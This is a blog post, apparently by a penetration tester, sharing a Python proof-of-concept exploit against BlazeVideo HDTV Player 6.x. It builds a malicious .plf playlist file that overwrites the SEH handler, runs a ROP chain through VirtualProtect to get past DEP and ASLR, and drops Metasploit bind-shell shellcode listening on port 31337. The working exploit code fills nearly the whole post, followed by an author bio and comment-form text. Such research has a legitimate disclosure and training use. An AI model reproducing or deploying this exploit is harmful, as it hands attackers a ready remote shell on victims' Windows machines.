Hi again, we tried to make a universal DEP and ASLR bypass version on BlazeVideo HDTV Player 6.x. This exploit is already public, but we just want to make it universal.

Take a look at mona.py 🙂 awesome tool developed by corelanc0d3r and his team
So here is the poc, it will bind to port 31337

#!/usr/bin/python

import struct
file = 'blazevideo-universal.plf'

totalsize = 5000
junk = 'A' * 872
align = 'B' * 136

#we don't need nseh
seh = '\x4a\x53\x30\x61'	# ADD ESP,800 # RETN
rop = '\x03\x60\x32\x61' * 10	# RETN (ROP NOP)
rop+= '\x7a\x34\x05\x64' 	# POP EDX # RETN
rop+= '\x08\x11\x01\x10'	# ptr to VirtualProtect()
rop+= '\x03\x05\x01\x64'	# PUSH EDX # POP EAX # POP ESI # RETN
rop+= '\x41\x41\x41\x41'	# Filler
rop+= '\x9f\x94\x60\x61'	# MOV ECX,DWORD PTR DS:[EDX] # POP SOMETHING
rop+= '\x41\x41\x41\x41' * 3	# Filler
rop+= '\x18\x42\x60\x61'	# PUSH ECX # ADD AL,5F # XOR EAX,EAX
rop+= '\x41\x41\x41\x41' * 3	# Filler
rop+= '\xa6\xd1\x03\x64'	# POP EBP # RETN
rop+= '\x41\x41\x41\x41' * 3	# Filler
rop+= '\x5A\x05\x61\x61'	# push esp #  ret 0c
rop+= '\xA8\x3E\x32\x61'	# POP EAX # RETN
rop+= '\x9D\x79\x39\xA1'	# 0x00000501-> ebx
rop+= '\xfc\x03\x02\x64' 	# ADD EAX,5EC68B64 # RETN
rop+= '\x7b\xd3\x63\x61'	# PUSH EAX # ADD AL,5E
rop+= '\x07\x68\x62\x61' 	# XOR EAX,EAX # RETN
rop+= '\xfc\x03\x02\x64' 	# ADD EAX,5EC68B64 # RETN
rop+= '\x7a\x34\x05\x64' 	# POP EDX # RETN
rop+= '\xDC\x74\x39\xA1'	# 0x00000040-> edx
rop+= '\xfb\x07\x31\x61' 	# ADD EDX,EAX # MOV EAX,EDX
rop+= '\xc0\x1f\x60\x61'	# POP ECX # RETN
rop+= '\x40\x03\x35\x60'	# Writable location
rop+= '\x07\x9e\x32\x61'	# POP EDI # RETN
rop+= '\x03\x60\x32\x61'	# RETN (ROP NOP)
rop+= '\x95\x65\x60\x61'	# POP EAX # RETN
rop+= '\x90\x90\x90\x90'	# nop
rop+= '\xF1\x0C\x62\x61'	# PUSHAD # RETN

nop = '\x90' * 32

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process, 

shellcode = (
"\xdd\xc1\xd9\x74\x24\xf4\xbb\xc4\xaa\x69\x8a\x58\x33\xc9\xb1"
"\x56\x83\xe8\xfc\x31\x58\x14\x03\x58\xd0\x48\x9c\x76\x30\x05"
"\x5f\x87\xc0\x76\xe9\x62\xf1\xa4\x8d\xe7\xa3\x78\xc5\xaa\x4f"
"\xf2\x8b\x5e\xc4\x76\x04\x50\x6d\x3c\x72\x5f\x6e\xf0\xba\x33"
"\xac\x92\x46\x4e\xe0\x74\x76\x81\xf5\x75\xbf\xfc\xf5\x24\x68"
"\x8a\xa7\xd8\x1d\xce\x7b\xd8\xf1\x44\xc3\xa2\x74\x9a\xb7\x18"
"\x76\xcb\x67\x16\x30\xf3\x0c\x70\xe1\x02\xc1\x62\xdd\x4d\x6e"
"\x50\x95\x4f\xa6\xa8\x56\x7e\x86\x67\x69\x4e\x0b\x79\xad\x69"
"\xf3\x0c\xc5\x89\x8e\x16\x1e\xf3\x54\x92\x83\x53\x1f\x04\x60"
"\x65\xcc\xd3\xe3\x69\xb9\x90\xac\x6d\x3c\x74\xc7\x8a\xb5\x7b"
"\x08\x1b\x8d\x5f\x8c\x47\x56\xc1\x95\x2d\x39\xfe\xc6\x8a\xe6"
"\x5a\x8c\x39\xf3\xdd\xcf\x55\x30\xd0\xef\xa5\x5e\x63\x83\x97"
"\xc1\xdf\x0b\x94\x8a\xf9\xcc\xdb\xa1\xbe\x43\x22\x49\xbf\x4a"
"\xe1\x1d\xef\xe4\xc0\x1d\x64\xf5\xed\xc8\x2b\xa5\x41\xa2\x8b"
"\x15\x22\x12\x64\x7c\xad\x4d\x94\x7f\x67\xf8\x92\xb1\x53\xa9"
"\x74\xb0\x63\x37\xec\x3d\x85\xad\xfe\x6b\x1d\x59\x3d\x48\x96"
"\xfe\x3e\xba\x8a\x57\xa9\xf2\xc4\x6f\xd6\x02\xc3\xdc\x7b\xaa"
"\x84\x96\x97\x6f\xb4\xa9\xbd\xc7\xbf\x92\x56\x9d\xd1\x51\xc6"
"\xa2\xfb\x01\x6b\x30\x60\xd1\xe2\x29\x3f\x86\xa3\x9c\x36\x42"
"\x5e\x86\xe0\x70\xa3\x5e\xca\x30\x78\xa3\xd5\xb9\x0d\x9f\xf1"
"\xa9\xcb\x20\xbe\x9d\x83\x76\x68\x4b\x62\x21\xda\x25\x3c\x9e"
"\xb4\xa1\xb9\xec\x06\xb7\xc5\x38\xf1\x57\x77\x95\x44\x68\xb8"
"\x71\x41\x11\xa4\xe1\xae\xc8\x6c\x11\xe5\x50\xc4\xba\xa0\x01"
"\x54\xa7\x52\xfc\x9b\xde\xd0\xf4\x63\x25\xc8\x7d\x61\x61\x4e"
"\x6e\x1b\xfa\x3b\x90\x88\xfb\x69")

sisa = 'C' * (totalsize - len(seh+rop+nop+shellcode))
payload = junk+seh+align+rop+nop+shellcode+sisa

f = open(file,'w')
print "Author: modpr0be"
f.write(payload)
print "File",file, "successfully created"
f.close()

here is the result, tested on Windows 7 SP1:
BlazeDVD pwned

About the Author modpr0be

Posisi saya saat ini sebagai direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation. Saya sering memberikan konsultasi tentang strategi keamanan kepada investor, mitra, dan pelanggan. Saya juga memberikan materi dalam bentuk pelatihan dan kontribusi komunitas dalam bentuk seminar, workshop, dan diskusi dengan berbagai topik seperti teknik peretasan, teknik eksploitasi, dan analisis intrusi. Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini saya memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE). Jika ingin menghubungi saya dapat melalui email di tom at spentera dot id.

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google

You are commenting using your Google account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d blogger menyukai ini: